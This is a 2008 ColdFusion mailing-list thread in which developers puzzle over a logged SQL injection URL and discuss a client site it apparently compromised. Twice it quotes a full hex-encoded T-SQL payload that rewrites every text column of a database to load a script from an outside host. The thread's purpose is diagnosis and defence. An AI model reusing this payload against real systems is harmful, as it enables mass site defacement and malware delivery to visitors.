Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger

[Brian Yager]

Mark,

I apologize for posting it the way I did.  I did find it interesting finding 
the exact attack on a site that was being discussed in the thread.  Please 
forgive me.

Brian

>Brian and all,
>
>I apologize for that. The issue here is not negligence on the part of our
>excellent team. The problem is that like a lot of dev shops - we don't keep
>up with our portfolio of customers on our own web site. I have removed the
>link to Rent Iowa. They have not been an active customer of ours for more
>than 2 years - and we did not create any of the public facing pages on the
>site. Still... Here I am with egg on my face.
>
>-Mark
>
>P.S. - I am expecting a call from them any moment now :)
>
>Mark A. Kruger, CFG, MCSE
>(402) 408-3733 ext 105
>www.cfwebtools.com
>www.coldfusionmuse.com
>www.necfug.com
>
>Kruger
>
>Mark,
>
>I went to your site Coldfusionmuse to read about that attack.  I then
>noticed the link to cfwebtools at the top.  Needing some help with a
>project, I looked at one of the sites they helped create only to see that
>same SQL injection attack had succeeded on the site (www.rentiowa.com).  
>
>Brian 

~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to 
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309484
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4

RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger

[Mark Kruger]

Brian and all,

I apologize for that. The issue here is not negligence on the part of our
excellent team. The problem is that like a lot of dev shops - we don't keep
up with our portfolio of customers on our own web site. I have removed the
link to Rent Iowa. They have not been an active customer of ours for more
than 2 years - and we did not create any of the public facing pages on the
site. Still... Here I am with egg on my face.

-Mark

P.S. - I am expecting a call from them any moment now :)

Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-Original Message-
From: Brian Yager [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, July 22, 2008 10:22 AM
To: CF-Talk
Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark
Kruger

Mark,

I went to your site Coldfusionmuse to read about that attack.  I then
noticed the link to cfwebtools at the top.  Needing some help with a
project, I looked at one of the sites they helped create only to see that
same SQL injection attack had succeeded on the site (www.rentiowa.com).  

Brian

>This is a popular and very malicious SQL injection attack that is 
>making the
>rounds:
>
>http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-
>And-A
>SCII
>
>-Mark
> 
>
>
>Mark A. Kruger, CFG, MCSE
>(402) 408-3733 ext 105
>www.cfwebtools.com
>www.coldfusionmuse.com
>www.necfug.com
>
>Just was looking at a 'user monitor' page on one of my sites and I saw 
>the url string below being called. I've seen several sql injection urls 
>before, but what the heck are they trying to accomplish here? 
>Eeverything is cfqueryparam'ed. Thanks, Che
>
>/rss.cfm?';DECLARE @S CHAR(4000);SET
>@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726
>36861 
>72283430303029204445434C415245205461626C655F437572736F7220435552534F522
>0464F
>522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A656
>37473 
>20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642
>0612E
>78747970653D27752720616E642028622E78747970653D3939206F7220622E787479706
>53D33 
>35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504
>54E20
>5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655
>F4375 
>72736F7220494E544F2040542C4043205748494C4528404046455443485F53544154555
>33D30 
>2920424547494E20657865632827757064617465205B272B40542B275D20736574205B2
>72B40 
>432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420737
>2633D 
>22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3
>C212D
>2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F74697
>46C65
>3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6
>A7322
>3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205
>46162
>6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C6
>55F43
>7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS 
>CHAR(4000));EXEC(@S);



~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to 
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309475
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: 
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4

RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger

[Experienced CF Developer]

Okay, stupidly, I clicked on rent.com (? Used to avoid perpetuation) to
see what Brian was talking about and now I see the reference to a .js file
on one of the pages.  I didn't just infect my pc with something, did I?

I surely hope that we are not perpetuating some virus with these e-mails.  

Also, Brian, IMHO, I think your comment would have been more appropriate to
make off-list.

Sincerely,

Dave Phillips


~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to 
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309469
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: 
http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4

Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... For Mark Kruger

[Brian Yager]

Mark,

I went to your site Coldfusionmuse to read about that attack.  I then noticed 
the link to cfwebtools at the top.  Needing some help with a project, I looked 
at one of the sites they helped create only to see that same SQL injection 
attack had succeeded on the site (www.rentiowa.com).  

Brian

>This is a popular and very malicious SQL injection attack that is making the
>rounds:
>
>http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-A
>SCII
>
>-Mark
> 
>
>
>Mark A. Kruger, CFG, MCSE
>(402) 408-3733 ext 105
>www.cfwebtools.com
>www.coldfusionmuse.com
>www.necfug.com
>
>Just was looking at a 'user monitor' page on one of my sites and I saw the
>url string below being called. I've seen several sql injection urls before,
>but what the heck are they trying to accomplish here? Eeverything is
>cfqueryparam'ed. Thanks, Che
>
>/rss.cfm?';DECLARE @S CHAR(4000);SET
>@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861
>72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F
>522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473
>20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E
>78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33
>35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20
>5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375
>72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
>2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40
>432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D
>22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D
>2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65
>3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322
>3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162
>6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43
>7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
>CHAR(4000));EXEC(@S); 

~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to 
date
Get the Free Trial
http://ad.doubleclick.net/clk;203748912;27390454;j

Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309468
Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4